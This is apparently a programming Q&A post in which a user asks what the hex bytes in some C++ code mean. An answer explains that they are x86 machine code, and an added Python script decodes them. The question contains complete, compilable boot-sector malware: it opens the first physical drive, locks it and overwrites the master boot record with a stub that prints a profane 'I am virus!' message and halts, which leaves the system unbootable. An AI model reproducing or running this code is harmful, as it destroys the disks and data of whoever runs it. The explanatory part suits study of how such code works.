This is C++ code from the internet that modifies the MBR. What do those "0xNN"-style hexadecimal codes mean? Are they ASCII?

#include <windows.h>
#include <winioctl.h>
#include <string.h>

unsigned char scode[] =
    "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
    "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
    "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

/*
00000000 B81200   mov ax, 12H    ; ah = 0, al = 12h (640 * 480)
00000003 CD10     int 10h        ; enter graphics display mode, hide the cursor
00000005 BD187C   mov bp, Msg    ; ES:BP = string address
00000008 B91800   mov cx, 18h    ; CX = string length
0000000B B80113   mov ax, 1301h  ; AH = 13, AL = 01h
0000000E BB0C00   mov bx, 000ch  ; page 0 (BH = 0), red on black (BL = 0Ch, bright)
00000011 BA1D0E   mov dx, 0e1dh  ; dh = row, dl = column
00000014 CD10     int 10h        ; interrupt 10h
00000016 E2FE     loop $
Msg:     db "I am virus! Fuck you :-)"
What is the relationship between these and the hexadecimal characters above?
*/

int WINAPI WinMain(
    HINSTANCE hInstance,      // handle to current instance
    HINSTANCE hPrevInstance,  // handle to previous instance
    LPSTR lpCmdLine,          // pointer to command line
    int nCmdShow              // show state of window
)
{
    HANDLE hDevice;
    DWORD dwBytesWritten, dwBytesReturned;
    BYTE pMBR[512] = {0};

    // Rebuild the MBR
    memcpy(pMBR, scode, sizeof(scode) - 1);
    pMBR[510] = 0x55;
    pMBR[511] = 0xAA;

    hDevice = CreateFile("\\\\.\\PHYSICALDRIVE0",
                         GENERIC_READ | GENERIC_WRITE,
                         FILE_SHARE_READ | FILE_SHARE_WRITE,
                         NULL,
                         OPEN_EXISTING,
                         0,
                         NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
        return -1;

    DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

    // Write the virus contents
    WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);

    DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
    CloseHandle(hDevice);
    return 0;
}
Your comment already tells you quite clearly: scode[] = "\xb8\x12\x00\xcd\x10\xbd\x18....
These are the machine-code bytes of assembly instructions; they correspond to
00000000 B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)
and so on.
This is a boot-sector virus; it requires the programmer to have a background in assembly.
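As an added worked example (not part of the question or the answer above), the following Python script decodes the bytes of scode[] back into the listing given in the comment, then uses the operands of mov bp and mov cx to locate the message string exactly as the BIOS int 10h, AH=13h "write string" service would. It assumes only the standard boot-sector load address 0x7C00 and knows just the seven opcodes that occur in this stub; it reads a byte string in memory and never touches a disk.

```python
# Added example: show that the "\x.." values in scode[] are x86 16-bit
# opcode bytes (the first 0x18 of them) followed by the ASCII message.
import struct

# The 48 bytes of scode[] from the question, copied as a bytes literal.
SCODE = (b"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
         b"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
         b"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29")

# Assumption: the BIOS loads sector 0 to 0000:7C00, which is why the stub
# uses "mov bp, 0x7c18" to address the string at offset 0x18 of the sector.
BOOT_ORG = 0x7C00

# Only the opcodes that occur in this stub: opcode -> (mnemonic, operand kind).
OPCODES = {
    0xB8: ("mov ax", "imm16"),
    0xB9: ("mov cx", "imm16"),
    0xBA: ("mov dx", "imm16"),
    0xBB: ("mov bx", "imm16"),
    0xBD: ("mov bp", "imm16"),
    0xCD: ("int", "imm8"),
    0xE2: ("loop", "rel8"),
}


def disassemble(code):
    """Decode from offset 0 up to and including the `loop` that ends the stub.

    Returns (listing, regs): listing is [(offset, hex bytes, text)] and regs
    records the 16-bit immediates moved into registers along the way.
    """
    listing, regs, off = [], {}, 0
    while off < len(code):
        op = code[off]
        if op not in OPCODES:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {off:#x}")
        mnemonic, kind = OPCODES[op]
        if kind == "imm16":
            # 16-bit immediate, little-endian: B8 12 00 -> mov ax, 0x0012
            (imm,) = struct.unpack_from("<H", code, off + 1)
            regs[mnemonic.split()[1]] = imm
            size, text = 3, f"{mnemonic}, {imm:#06x}"
        elif kind == "imm8":
            # CD 10 -> int 0x10
            size, text = 2, f"{mnemonic} {code[off + 1]:#04x}"
        else:
            # E2 FE: signed 8-bit displacement relative to the next instruction;
            # -2 jumps back onto the loop itself, i.e. "loop $".
            (disp,) = struct.unpack_from("<b", code, off + 1)
            target = off + 2 + disp
            size, text = 2, ("loop $" if target == off else f"loop {target:#06x}")
        listing.append((off, code[off:off + size].hex(), text))
        off += size
        if kind == "rel8":
            break  # the stub spins here forever; the bytes after it are data
    return listing, regs


def extract_message(code):
    """Locate the string the way int 10h/AH=13h does: ES:BP = address, CX = length."""
    _, regs = disassemble(code)
    start = regs["bp"] - BOOT_ORG
    return code[start:start + regs["cx"]].decode("ascii")


if __name__ == "__main__":
    listing, regs = disassemble(SCODE)
    for off, raw, text in listing:
        print(f"{off:08X} {raw.upper():<8} {text}")
    print(f"message at sector offset {regs['bp'] - BOOT_ORG:#x}, "
          f"{regs['cx']} bytes: {extract_message(SCODE)!r}")
```

The listing it prints matches the commented disassembly in the question line for line, and the final string shows that only the tail of the array is ASCII; the first 24 bytes are instructions, not text.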